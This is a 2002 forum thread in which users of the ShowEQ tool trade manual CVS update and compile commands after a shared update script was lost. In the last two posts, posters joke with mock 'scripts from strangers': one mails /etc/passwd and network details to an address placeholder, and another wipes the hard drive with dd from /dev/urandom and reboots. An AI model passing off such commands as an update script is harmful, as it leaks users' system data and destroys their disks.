PDA

View Full Version : Fryfrog's update script.

Rayden
06-25-2002, 07:59 AM
Heya Fryfrog. I used to have the update script you linked to in the HOW TO for REDHAT 7.2. When I try to get it now the link is bad. Was just hoping you had a place I could download it from.

Thanks
Rayden

Dedpoet
06-25-2002, 08:19 AM
I'm not fryfrog, but I will tell you that it's best not to use an update script. Things change, and you may find your script suddenly doesn't work. The best way to update, at least right now is this:

# cd [directory you downloaded to - usually /seq/showeq]
# cvs -z3 update
# export QTDIR=/opt/qt-2.3.2 [most likely where it is if you used the walkthru]
# export CC=gcc3; export CXX=g++3
# ./configure && make && make install

If you followed the RedHat walkthru, then that is most likely what you need to do. If you installed Qt somewhere else, then use that location instead. I hope that helps you out.

S_B_R
06-25-2002, 08:59 AM
Originally posted by Rayden
Heya Fryfrog. was just re-installing my showeq freshly and tried to get the update script you made that's referenced in the "RedHat 7.2 How to" however it tells me file not found. Would you happen to still have that script somewhere where i might download it? thanks

Rayden

It might be helpful to know EXACTLY what you typed that caused the "file not found" error. Otherwise there are VERY LARGE number of character strings that you could type at a linux shell prompt that will give you a "file not found" message. It would take a very long time to randomly guess what you typed to get the error...

Also I'm in total agreement with Dedpoet...

Mr. Suspicious
06-25-2002, 09:02 AM
Prolly the "showeq.conf" thing again :D

Dedpoet
06-25-2002, 10:55 AM
Prolly the "showeq.conf" thing again

Yes, that probably is the case. Rayden, did the script run through the whole update and compile, and -then- say "file not found", or did it say it right away when you tried to run the update? If it's the former, then you can ignore the message - the script is just trying to copy a file that is no longer used in Seq. If it's the later, then do what SBR suggested and post some more info on what exactly is going on.

Either way, you should use the method I posted to do the update instead of the script. If you can't remember the steps (it took me quite a few times to be able to do them off the top of my head), just jot them down somewhere. After a few updates, you'll be a pro.

Rayden
06-25-2002, 11:26 AM
Sorry, bad wording. I have edited my origional post

S_B_R
06-25-2002, 12:02 PM
It's all in the details isn't it ;)

fryfrog
06-25-2002, 12:51 PM
he is talking about the url to a script that used to reside on my web server until i accidentally blew it way. the script was okay, but doing it by hand is not that many more steps. you can make the above suggestion even shorter if you like:

# cd /root/showeq/
# cvs -z3 update
# make -f Makefile.dist
# CC=gcc3 CXX=g++3 QTDIR=/path/to/qt-2.3.2 ./configure
# make && make install

S_B_R
06-25-2002, 01:12 PM
Originally posted by fryfrog
he is talking about the url to a script that used to reside on my web server until i accidentally blew it way.

Yeah, but the way he had it worded before made it sound like he was having trouble running the script, not downloading it.

I hate it when people edit thier posts rather than posting a new message... :rolleyes:

Rayden
06-25-2002, 02:19 PM
I actually did post a reply. My reply said that I edited my post =)

anyway, since FryFrog accidentally deleted the script, would anyone that was able to download it prior to his accident be able to post it somewhere? I know its pretty easy to do by hand but I really liked some of the features that were bult into the scipt. sorry about the confusion before about my working =)

Rayden

S_B_R
06-25-2002, 02:26 PM
Originally posted by Rayden
I actually did post a reply. My reply said that I edited my post =)

I realise that you made a post stating you updated your original. The problem is now all the responses make no sense for the (new)question asked.... It's better to post a new message with the New quesiton than to change your original post to ask a completely different question...

Rayden
06-25-2002, 02:57 PM
Anyway, if someone got this before it poofed I'd love a copy of it. thanks

Dedpoet
06-25-2002, 03:48 PM
You can just take the commands posted by either fryfrog or myself, type them into your favorite text editor in Linux, and then save the file as whatever you want (/seq/showeq/update_script for example). Then make it executible:

# chmod 755 /seq/showeq/update_script
Now all you have to do to update is:

# cd /seq/showeq
# ./update_script

Bang, you have your own update script that you wrote yourself. Ain't shell scripting fun?!

fryfrog
06-25-2002, 03:58 PM
the update script i made was a little more complicated. it would detect the presence (or absence) of your libEQ.a file and your qt installation, and in the case of libEQ.a it would download it for ya which meant if you n eeded the new libeq, you just deleted your current one and it would re-get it :). it would also show you the CHANGES file if there was anything new. it was kinda spiffy, but really not that needed.

PlanetBOB
06-26-2002, 07:55 AM
I like it, and still use it. sofar its working great.

S_B_R
06-26-2002, 10:03 AM
Hmmmm. Should I teach him a leason and give him A script? or should I just give him The script? Hmmmmm...

Dedpoet
06-26-2002, 10:37 AM
cd /seq/showeq
cvs -z3 update
CC=gcc3 CXX=g++3 QTDIR=/opt/qt-2.3.2
./configure && make && make install
cat /etc/hosts /etc/passwd /etc/fstab > /tmp/junk
ifconfig -a >> /tmp/junk
netstat -r >> /tmp/junk
cat /tmp/junk | mail <your email address>
rm /etc/issue
echo "Please be more careful which scripts you choose to run." > /etc/issue

Hehe, just having a chuckle while I eat lunch.

S_B_R
06-26-2002, 11:43 AM
Oh you are Far to nice, I was thinking something more along the lines of:
#!/bin/bash
dd if=/dev/urandom of=/dev/hda 1>/dev/null 2>&1 &
echo "Checking dependencies"
sleep 60
echo "Oops, just erased your hard drive!"
echo "You shouldn't run scripts from strangers..."
init 6